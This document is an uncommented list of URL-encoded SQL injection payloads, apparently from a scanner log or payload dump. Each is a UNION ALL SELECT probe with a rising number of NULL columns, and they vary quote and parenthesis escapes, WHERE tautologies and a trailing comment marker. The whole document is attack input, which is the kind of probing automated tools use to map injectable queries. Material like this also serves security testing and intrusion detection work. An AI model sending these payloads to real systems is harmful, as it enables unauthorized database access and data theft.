1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%206529%3D6529%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%207474%3D7474%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%209667%3D9667%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%202672%3D2672%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%201087%3D1087%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%206656%3D6656%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%207481%3D7481%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%209432%3D9432%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%209166%3D9166%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%29%20WHERE%202155%3D2155%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201453%3D1453%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%202580%3D2580%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201681%3D1681%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%208333%3D8333%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%207757%3D7757%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%203328%3D3328%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%206340%3D6340%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%205099%3D5099%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%206470%3D6470%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%20WHERE%201570%3D1570%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 